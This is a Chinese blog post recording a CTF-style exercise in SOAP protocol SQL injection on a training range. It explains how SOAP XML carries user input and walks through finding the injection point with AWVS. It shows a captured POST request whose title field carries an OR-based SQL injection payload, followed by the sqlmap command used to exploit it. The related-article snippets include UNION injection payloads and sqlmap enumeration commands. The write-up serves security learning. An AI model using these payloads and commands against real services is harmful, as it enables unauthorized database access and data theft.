SOAP注入学习——安鸾靶场---SOAP协议注入 练习记录

最新推荐文章于 2024-06-13 17:26:36 发布
最新推荐文章于 2024-06-13 17:26:36 发布
阅读量2.8k 收藏 1
点赞数 1
分类专栏: CTF -WEB 学习 文章标签: 安全 spring java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/AAAAAAAAAAAA66/article/details/122770895
版权
本文详细讲解了SOAP协议注入原理,从SQL注入的关联出发,介绍了SOAP协议的结构,展示了如何通过SOAP数据包构造与SQL注入的结合,并通过实例演示了漏洞发现与利用的过程。提醒读者在开发中注意安全,强调了在靶场环境下学习网络安全的重要性。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

新年好啊!

今天初二,给大家拜个年了,也祝师傅们新的一年取得更大的进步。

目录

SOAP注入知识点

过程

 

SOAP注入知识点

SOAP注入 - 知乎

👆👆👆👆👆👆👆👆👆👆👆👆详细的大家可以看上面掌控者学院的解释(不是广告)。

当然,如果想仔细理解的话,看上面的解释已经是足够了,不过,我觉得大家还是喜欢听人话。。。。。。。。。。。。。。

大家如果熟悉sql注入的话,肯定是知道我们输入的数据会放在数据库进行比较的,一般我们通过拼接语句,进而爆出数据库的东西。

凡是我们输入的数据会拼接到数据库中查询的,都有可能存在sql注入

为什么要先讲这个呢???

这个和SOAP协议注入有什么关联么???

而SOAP又是什么呢???

  1. 首先可以理解为SOAP是一种xml格式的数据。
  2. SOAP协议最终的产物是一个xml格式数据。
  3. 而且数据库会存储这种XML格式的数据。
  4. 这样就满足了sql注入的存在可能 。

例子 建议先看看教程

 SOAP注入 - 知乎

这是soap协议的XML文件

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetServiceCustomer xmlns="http://tempuri.org/">
      <UserID>string</UserID>
      <ServiceType>string</ServiceType>
      <CO_CODE>string</CO_CODE>
    </GetServiceCustomer>
  </soap:Body>
</soap:Envelope>

其中UserID 这个数据可能存在注入,

所以我们需要找到上传UserID 的功能点,最后修改发送的包含XML数据的数据包。

过程

先查找下目录

然后并没有发现啥数据 只有个 /soap

 存在wsdl文件,但怎么找到发送数据包得地方呢?

按照大佬的write up 走,AWVS扫描一下。

没扫出SOAP注入漏洞 。但有地址了

选择 AWVS 的 web service scanner 模块 扫描漏洞地址

出现漏洞报告(注意点击  View HTTP headers)

 其实这里用bp抓包也能实现。

复制 发送的数据包

POST /ws_soap.php HTTP/1.1
Content-Type: text/xml
SOAPAction: "urn:tickets_stock#get_tickets_stock"
Content-Length: 572
X-Requested-With: XMLHttpRequest
Referer: http://47.103.94.191:8018/ws_soap.php?wsdl
Host: 47.103.94.191:8018
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/"  xmlns:xsd="http://www.w3.org/1999/XMLSchema"  xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance"  xmlns:m0="http://tempuri.org/"  xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:urn="urn:movie_service">
     <SOAP-ENV:Header/>
     <SOAP-ENV:Body>
        <get_tickets_stock>
         <title>-1&apos; OR 3*2*1=6 AND 000666=000666 -- </title>
        </get_tickets_stock>
     </SOAP-ENV:Body>
</SOAP-ENV:Envelope>

新建一个名为2.txt的文件,把上面的数据复制。

sqlmap 跑 比较慢 需要 10分钟左右

sqlmap -r 2.txt -batch

只存了一张图了 。。。

参考链接

SOAP注入 - 知乎

SOAP注入攻击详解(转)_weixin_30849403的博客-CSDN博客

 SQL注入:SOAP协议注入_zh的博客-CSDN博客

本文目的是为了传播网络安全知识,一切的操作都是在靶场进行,禁止利用本文提到的任何技术与工具进行违法操作!后果自负!

日站不规范,亲人两行泪!

SOAP协议注入
weixin_51861515的博客
02-25 496
抓包结合数据构造xml 进行测试只有or可以用 可以进行布尔盲注 写脚本时要注意缩进 #coding:utf-8import requestsheaders={'Content-Type':'text/xml', 'SOAPAction':'urn:get_tickets_stock'} url="http://47.103.94.191:8018/ws_soap.php"result=""for x in range(1,100): hig...
SOAP注入
hackzkaq的博客
03-21 5377
零基础学黑客,搜索公众号:白帽子左一 soap 注入简介 soap注入就是在webservice 的soap协议,连接web服务和客户端的接口处的注入,通过在发送的soap消息参数内添加注入语句来达到注入效果,常见的有sql注入,也有xml注入,代码注入 什么是soap 首先介绍webservice,webservice是一种跨平台,跨语言的规范,用于不同平台,不同语言间的交互,webservice有三要素,分别为soap,wsdl和uddl,uddl用于提供发布和查询webservice方法,wsdl是
Soap 协议 详解
emowuyi
08-19 575
SOAP简介SOAP(SimpleObjectaccessPRotocal,简单对象访问协议)技术有助于实现大量异构程序和平台之间的互操作性,从而使存在的应用能够被广泛的用户所访问。SOAP是把成熟的基于HTTP的WEB技术与xml的灵活性和可扩展性组合在了一起。SOAP 的一个主要目标是使存在的应用能被更广泛的用户所使用。为了实现这个目的,没有任何SOAPAPI或SOAP对象请求代理(SOAPO...
测试SOAP注入.docx
09-06
测试SOAP注入
靶场 宽字符注入02 靶场练习 详细过程及解决问题笔记
AAAAAAAAAAAA66的博客
02-06 3433
题目 网站URL ECSHOP演示站 - Powered by ECShop 目录 笔记 过程 进入sql注入页面 问题 判断闭合符 sql注入下的模糊查询 right 语法爆字段值 笔记 对现在我来说难度其实不大,但题目考察的一些细节要求比较高。 首先把我遇到的问题 一 一 列出。(在下面解题的过程会一 一 解决) 题目虽然是叫宽字符注入,但实际考察的是报错注入 (挂羊头卖狗肉) 这个网站很大,注入点很难找(我也是看一位师傅的write up) 自己没有...
iOS实例开发源码——joshbuhler-Soap-193ab63.zip
07-02
这个压缩包文件“iOS实例开发源码——joshbuhler-Soap-193ab63.zip”显然是一个关于iOS应用开发的源代码库,由开发者joshbuhler创建,版本号为193ab63。从名称中的"Soap"我们可以推测,这个项目可能涉及到iOS应用与...
cxf-rt-bindings-soap-3.0.1-API文档-中文版.zip
04-27
赠送jar包:cxf-rt-bindings-soap-3.0.1.jar; 赠送原API文档:cxf-rt-bindings-soap-3.0.1-javadoc.jar; 赠送源代码:cxf-rt-bindings-soap-3.0.1-sources.jar; 赠送Maven依赖信息文件:cxf-rt-bindings-soap-...
easy-soap-request:小型Node.js库可简化SOAP请求
05-04
npm install easy-soap-request 要求 Node.js> = 7.6.0(异步/等待支持) 用法 Node.js const soapRequest = require ( 'easy-soap-request' ) ; const fs = require ( 'fs' ) ; // example data const url = '...
iOS游戏应用源代码——joshbuhler-Soap-193ab63.zip
07-05
iOS游戏应用源代码——joshbuhler-Soap-193ab63.zip
gus-soap-integration:这是一个使用SOAP协议从GUS(https
03-19
gus-soap-integration 这是一个使用SOAP协议从GUS( )获取数据的项目。该应用程序显示了以下用途: 多阶段Dockerfile来构建和运行应用程序 使用SOAP协议与第三方服务集成 验证并将请求参数绑定到对象 使用...
学院靶场——安全基础
最新发布
qq_55202378的博客
06-13 1543
后门端口,直接执行系统命令。注意:10021端口上ftp的后门端口为16200。添加完后,根据icon,可以看出这是一个python打包成的exe程序。看wp是由web.zip文件的,但是这里没有,所以搞不定了。下载提供的flag.zip和wordlist.txt,使用。:在vsftpd 2.3.4版本中,在登录输入用户名时输入。的返回包,可以拿到包含flag的txt文件。九阴真经上卷找不到,似乎被删了,只有下卷。类似于笑脸的符号,会导致服务处理开启。flag在whalwl数据库中。
soap 注入
黑战士的博客
10-26 465
soap是简单对象访问协议,用于分布式环境的基于信息交换的同行协议,描述传递信息的格式和规范,它可以用于连接web服务和客户端之间的接口,是一个可以在不同操作系统上运行的不同语言编写的程序之间的传输通信协议,格式为xml,soap消息。soap注入在webservice的soap协议,连接web服务和客户端的接口处的注入,通过在发送的soap消息参数内添加注入语句来达到注入效果。wsdl是webservice服务描述语言,用于web服务说明,它是一个xml文档,用于说明一组soap消息如何访问接口。
SQL注入SOAP协议注入
zh的博客
10-12 812
靶场地址:http://www.whalwl.host:8018/ 解题准备:AWVS扫描,以及sqlmap 解题思路: 1、首先用AWVS扫描站点,发现存在soap注入的页面地址 2、复制请求数据包,在kali中保存为soap.txt,使用sqlmap进行爆破 sqlmap -r soap.txt 3、确认数据为mysql,爆破库名 sqlmap -r soap.txt --dbms mysql --dbs whalwl应该就是靶场数据库,继续爆tables sqlm...
靶场】实战渗透
信安是不可或缺的一部分!
10-06 953
最近看到靶场有些比较有意思就打了一下午,有一定难度。
靶场 sql注入--SQL数字型GET注入01
s666789s的博客
04-06 629
1.SQL数字型GET注入01 (1)输入1’报错,输入-1返回正常,构造payload (2)判断显示位 -1 order by 3# -1 union select 1,2,3# (3)爆库:-1 union select 1,database(),3# (4)爆表:-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=‘dwvs’# (5)爆列:-1 union se
靶场】cmseasy&内网渗透 (500分)
信安是不可或缺的一部分!
10-10 1511
等后面靶场重置,总体思路是这样的但是有点小问题,这个redis拿shell其实挺麻烦的,之前打靶场时也遇到过写入任务计划但没成功,我重置多次后成功了,这个运行不太好,也可能是frp的配置有问题。找了半天在:http://106.15.50.112:8021/config/tag/category_27.php。这里不能使用反弹shell方式,因为有可能192.168.112.3只有内网无外网环境:这里只能使用写入私钥方式。frp工具地址:https://github.com/fatedier/frp。
SOAP协议注入
m0_71366428的博客
12-15 478
所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行指定的SQL语句。
靶场测试--渗透实战平台
ID_xiaomage的博客
09-13 2186
CMS系列-Discuz 题目URL:http://whalwl.host:8042/forum.php(tips:flag在网站根目录下) 文章目录CMS系列-Discuz前言一、利用Burp进行抓取数据包二、将数据包发送到Repeater1.构造请求参数验证漏洞是否存在2.利用Cookie信息上传Shell3.可以使用AntSword、Chopper或者Behinder进行连接,这里使用的是AntSword总结 前言 漏洞描述 Discuz ML! V3.X存在代码注入漏洞,攻击者通过精心构建的请求
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值